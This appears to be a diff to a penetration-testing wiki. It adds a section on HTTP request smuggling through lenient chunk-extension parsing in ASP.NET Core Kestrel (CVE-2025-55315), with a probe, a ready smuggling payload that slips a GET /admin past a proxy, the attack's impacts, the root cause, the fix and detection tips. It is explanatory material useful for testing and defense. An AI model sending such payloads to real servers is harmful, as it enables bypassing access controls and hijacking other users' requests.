How I Found the Worst ASP.NET Vulnerability — A $10K Bug (CV...

src/pentesting-web/http-request-smuggling/README.md

@@ -814,6 +814,63 @@ browser-http-request-smuggling.md
 request-smuggling-in-http-2-downgrades.md
 {{#endref}}
 
+## Chunked extension LF parsing (TERM.EXT) — Kestrel CVE-2025-55315
+
+A modern HTTP/1.1 smuggling primitive abuses discrepancies in how front-ends and back-ends parse chunked transfer-encoding extensions. Some back-ends accept a lone line feed (`\n`) inside the chunk-extension and continue scanning until a CRLF terminator, while some front-ends treat the LF as end-of-line. This TERM.EXT mismatch desynchronizes message boundaries and enables classic smuggling impacts.
+
+Protocol note
+- RFC 9112 §7.1.1: chunk-extension names are tokens.
+- RFC 9110 §5.6.2: tokens cannot contain control characters (including `\r`/`\n`). Any LF within a chunk-size line is invalid and should be rejected. Lenient parsers create FE↔BE boundary disagreement.
+
+Minimal behavior probe (lenient back-end)
+- Replace markers: [LF] = `0x0A`, [CRLF] = `\r\n`.
+
+```http
+POST /echo HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Transfer-Encoding: chunked
+
+2;ext[LF]
+xy[CRLF]
+0[CRLF]
+[CRLF]
+```
+Expected on a vulnerable back-end: the body echoed is "xy". The parser swallowed the lone LF within the extension and waited for the first CRLF to end the size line.
+
+Smuggling (TERM.EXT) with LF-terminating proxy
+When an LF-terminating proxy sits in front of a lenient back-end (e.g., vulnerable Kestrel), the same payload becomes a hop parsing discrepancy. The proxy ends the size line at LF and treats following bytes as chunk-data, while the back-end keeps scanning the extension until CRLF and then parses a second pipelined request.
+
+```http
+POST /one HTTP/1.1
+Host: app.example
+Connection: keep-alive
+Transfer-Encoding: chunked
+
+2;ext[LF]
+xx[CRLF]
+45[CRLF]
+GET /admin HTTP/1.1[CRLF]
+Host: app.example[CRLF]
+X: X[CRLF]
+0[CRLF]
+[CRLF]
+```
+Front-end view: chunk1 size=2 → data "xx"; then sees next size "45" and considers the subsequent bytes (including the attacker’s GET) as chunk data; only one visible request (/one) forwarded.
+Back-end view (lenient): the lone LF is accepted within the extension; scanning continues until the first CRLF, consuming bytes inside the attacker-crafted sequence. After extension/data processing consumes `45[CRLF]0[CRLF][CRLF]`, the following `GET /admin ...` is parsed as a second request on the same connection.
+
+Exploitation outcomes
+- Bypass front-end security controls (smuggle restricted paths/methods like /admin).
+- Request hijacking (capture the next user’s request/cookies appended to the socket).
+- Web cache poisoning and deception via hidden requests.
+
+Root cause and fix (ASP.NET Core Kestrel)
+- Root cause: `Http1ChunkedEncodingMessageBody.ParseExtension` looked only for `\r` when parsing extensions, allowing a lone `\n` to be treated as part of the extension.
+- Fix: validate for both `\r` and `\n` within extensions; reject unpaired line terminators. A temporary compatibility switch `InsecureChunkedParsing` was added but should not be enabled in production.
+
+Detection
+- Burp Suite HTTP Request Smuggler ≥3.0.2 includes probes for chunk-extension based smuggling (TERM.EXT). Enable LF-in-extension tests and confirm with the nested-response check or by disabling reuse to rule out pipelining artifacts.
+- Manual: verify echo behavior with the minimal probe, then send the smuggling payload and observe a second response being processed on the same upstream connection.
 ## Turbo intruder scripts
 
 ### CL.TE
@@ -932,6 +989,10 @@ def handleResponse(req, interesting):
 - Browser‑Powered Desync Attacks – [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)
 - PortSwigger Academy – client‑side desync – [https://portswigger.net/web-security/request-smuggling/browser/client-side-desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
 - [https://portswigger.net/research/http1-must-die](https://portswigger.net/research/http1-must-die)
-
+- [Praetorian – How I Found the Worst ASP.NET Vulnerability — A $10K Bug (CVE-2025-55315)](https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/)
+- [RFC 9112 – HTTP/1.1: Chunk extensions](https://www.rfc-editor.org/rfc/rfc9112.html#name-chunk-extensions)
+- [RFC 9110 – Field definitions: token syntax](https://www.rfc-editor.org/rfc/rfc9110.html#section-5.6.2)
+- [Funky Chunks (TERM.EXT background)](https://w4ke.info/2025/06/18/funky-chunks.html)
+- [Andrew Lock – Understanding the worst .NET vulnerability (CVE-2025-55315)](https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/xs-search/css-injection/less-code-injection.md

@@ -1,4 +1,6 @@
-## LESS Code Injection leading to SSRF & Local File Read
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
 
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
 
 * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
 * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+{{#include ../../../banners/hacktricks-training.md}}